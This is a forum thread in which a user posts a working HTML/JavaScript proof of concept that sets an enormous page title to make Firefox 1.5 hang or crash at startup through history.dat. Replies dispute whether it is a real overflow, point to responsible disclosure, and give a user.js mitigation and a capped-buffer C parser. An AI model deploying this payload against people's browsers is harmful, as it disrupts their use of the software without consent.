FireFox 1.5 Buffer overflow exploit
- Guest
This may have already been reported, but I'm going to post it here.
<!-- Firefox 1.5 buffer overflow
Basically firefox logs all kinds of URL data in its history.dat file,
this little script will set a really large topic and Firefox will then
save that topic into its history.dat.. The next time that firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen every time until you manually delete the history.dat file -- which
most users won't figure out.
this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifications.
Tested with Firefox 1.5 on Windows XP SP2.
ZIPLOCK <sickbeatz@gmail.com>
-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
    // Build a 5000-character string of "A"s.
    var buffer = "";
    for (var i = 0; i < 5000; i++) {
        buffer += "A";
    }
    // Append it 500 more times: 501 * 5000 = 2,505,000 characters.
    var buffer2 = buffer;
    for (i = 0; i < 500; i++) {
        buffer2 += buffer;
    }
    // Set the page title; Firefox records the title in history.dat.
    document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>
- name already taken
- Posts: 3124
- Joined: February 27th, 2004, 9:54 am
- Location: Utah
- hellene
- Posts: 5130
- Joined: March 20th, 2005, 5:29 pm
- Location: Bradford W.Yorks
- Contact:
I'll shift this over to Firefox Bugs for further discussion. Interesting discovery. markedmannerf you will have to register a username if you want to post in that forum.
I don't know how to do any of this stuff, I just hire the guys that do
Have you considered reading the HELP folder. Right there on your menu bar.
Image by Juniper http onic.net/~daylight/ - Xmas special by Ol Grumpy
- scratch
- Posts: 4942
- Joined: November 6th, 2002, 1:27 am
- Location: Massachusetts
This is NOT the proper way to report a security bug.
Please see http://www.mozilla.org/projects/securit ... olicy.html
- mesostinky
- Posts: 215
- Joined: November 4th, 2002, 10:44 pm
- Location: NJ
Is this your source?
http://packetstormsecurity.org/0512-exp ... erflow.txt
Hopefully they at least notified the security crew before they published this. Seeing as no update has been pushed out, I assume not. How kind of them.
-
- Posts: 309
- Joined: June 27th, 2005, 5:56 pm
- Contact:
It's on digg now http://digg.com/security/Kill_Firefox_1 ... te_exploit which means everyone knows.
- VIPerous
- Posts: 120
- Joined: September 20th, 2003, 5:15 am
Elfguy wrote:It's on digg now http://digg.com/security/Kill_Firefox_1 ... te_exploit which means everyone knows.
And here is one of the comments from Digg:
"And I can't believe you didn't see where the stack is involved. The size of whatever FF is reading is obviously BIGGER than whatever BUFFER is being used to store it, thus causing an OVERFLOW of that BUFFER."
How do YOU see where the stack is involved?
There is no buffer overflow and no threat of arbitrary code execution; Firefox does not crash when the script is executed, nor at startup when it reads history.dat.
The script causes a very large (~10MB) string to be written to history.dat (That's just a text file, you can open it in Notepad and take a look). The algorithm Firefox uses to parse this file was presumably not intended to handle such large strings and therefore takes a long time to load the file (1 to 2 mins).
It allocates a buffer on the heap of arbitrary size and begins reading the string. When it determines that the buffer is not big enough to hold the entire string it allocates a new, larger buffer, copies the old data to the new buffer, and continues reading. Repeat until you've allocated a buffer large enough to hold the entire 10MB string. Inefficient? Yes. Buffer overflow exploit? No."
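The grow-by-reallocation parser the Digg comment describes, written out as an added example in C (it is not code from the thread and not Firefox's own history.dat reader). read_field() pulls one newline-terminated field through a heap buffer that doubles whenever it fills, so a long field costs extra copying but never writes past the buffer; the max_len cap is an assumed mitigation that rejects oversized fields up front instead of spending minutes on them. fmemopen() (POSIX) stands in for the on-disk file, and the constructed input uses a 2,505,000-byte field, the title length the PoC script produces (5000 × 501).

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Result codes for read_field(); FIELD_OK carries the field, the rest reject it. */
enum { FIELD_OK = 0, FIELD_TOO_LONG = -1, FIELD_OOM = -2 };

/*
 * Read one newline-terminated field from fp into a heap buffer.
 * The buffer starts small and doubles whenever it fills: realloc() copies the
 * bytes read so far into the larger block and reading continues, which is the
 * scheme the post describes. Nothing is ever written past the current
 * capacity, so there is no overflow, only extra copying.
 * max_len (an assumed mitigation, not a Firefox setting) rejects fields longer
 * than the cap before any more time is spent on them. On FIELD_OK the caller
 * owns and frees *out.
 */
int read_field(FILE *fp, size_t max_len, char **out, size_t *out_len)
{
    size_t cap = 64, len = 0;
    char *buf = malloc(cap);
    int c;

    if (buf == NULL)
        return FIELD_OOM;
    while ((c = fgetc(fp)) != EOF && c != '\n') {
        if (len >= max_len) {              /* over the policy limit: reject */
            free(buf);
            return FIELD_TOO_LONG;
        }
        if (len + 1 >= cap) {              /* need room for this byte and the NUL */
            char *bigger = realloc(buf, cap * 2);
            if (bigger == NULL) {
                free(buf);
                return FIELD_OOM;
            }
            buf = bigger;
            cap *= 2;
        }
        buf[len++] = (char)c;
    }
    buf[len] = '\0';
    *out = buf;
    *out_len = len;
    return FIELD_OK;
}

/*
 * Build a constructed two-field file ("title\n" followed by big_len 'A's and a
 * newline), parse it with the given cap, and return the length of the big
 * field on success or the negative FIELD_* code on rejection (-3 if the first
 * field did not come back intact).
 */
long demo_big_field(size_t big_len, size_t max_len)
{
    const char head[] = "title\n";
    size_t head_len = sizeof head - 1;
    size_t text_len = head_len + big_len + 1;
    char *text = malloc(text_len);
    char *field = NULL;
    size_t len = 0;
    long result;
    FILE *fp;

    if (text == NULL)
        return FIELD_OOM;
    memcpy(text, head, head_len);
    memset(text + head_len, 'A', big_len);
    text[head_len + big_len] = '\n';

    fp = fmemopen(text, text_len, "r");
    if (fp == NULL) {
        free(text);
        return FIELD_OOM;
    }
    /* The short first field must parse before we look at the big one. */
    if (read_field(fp, max_len, &field, &len) != FIELD_OK
        || len != 5 || strcmp(field, "title") != 0) {
        free(field);
        fclose(fp);
        free(text);
        return -3;
    }
    free(field);
    result = read_field(fp, max_len, &field, &len);
    if (result == FIELD_OK) {
        result = (long)len;
        free(field);
    }
    fclose(fp);
    free(text);
    return result;
}

int main(void)
{
    /* 5000 x 501 = 2,505,000 bytes, the title length the PoC script produces. */
    printf("cap 1 MiB: %ld\n", demo_big_field(2505000, 1u << 20));  /* -1: rejected */
    printf("cap 8 MiB: %ld\n", demo_big_field(2505000, 1u << 23));  /* 2505000 */
    return 0;
}
```

With an 8 MiB cap the whole field is read after roughly sixteen doublings, which is the slow-but-safe behaviour the comment describes; with a 1 MiB cap the field is rejected as soon as the limit is crossed, which is the cheap way to keep one oversized record from stalling startup.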
-
- Posts: 309
- Joined: June 27th, 2005, 5:56 pm
- Contact:
It's not a "security issue" as there's no known way to exploit or run malicious code, all this does is cause Firefox to load much slower. Still I think this should be fixed fast and a 1.5.1 should be available within a week to reaffirm that open source releases fixes fast. It's a PR thing. Would be good to see if the update feature works fine too!
-
- Posts: 4941
- Joined: July 31st, 2003, 1:26 pm
One-line fix in user.js:
user_pref("capability.policy.default.HTMLDocument.title.set", "noAccess");
Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.
-
- Posts: 309
- Joined: June 27th, 2005, 5:56 pm
- Contact:
- hellene
- Posts: 5130
- Joined: March 20th, 2005, 5:29 pm
- Location: Bradford W.Yorks
- Contact:
Thanks for picking up on this Elfguy and others. The OP started off in the user support forum - I figured the crew over here might have some more answers.
-
- Posts: 46
- Joined: November 28th, 2002, 6:25 pm
Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858
-
- Posts: 778
- Joined: November 9th, 2004, 2:31 pm
- Location: Central Florida
- Contact:
Spaceman-Spiff wrote:Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858
They're two different problems.
-
- Posts: 13
- Joined: May 15th, 2005, 1:20 pm
Unarmed wrote: One-line fix in user.js:
user_pref("capability.policy.default.HTMLDocument.title.set", "noAccess");
Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.
I am unable to find the user.js file... I tried adding it to prefs.js without success. Any direction?
I am using XP SP2. Thanks.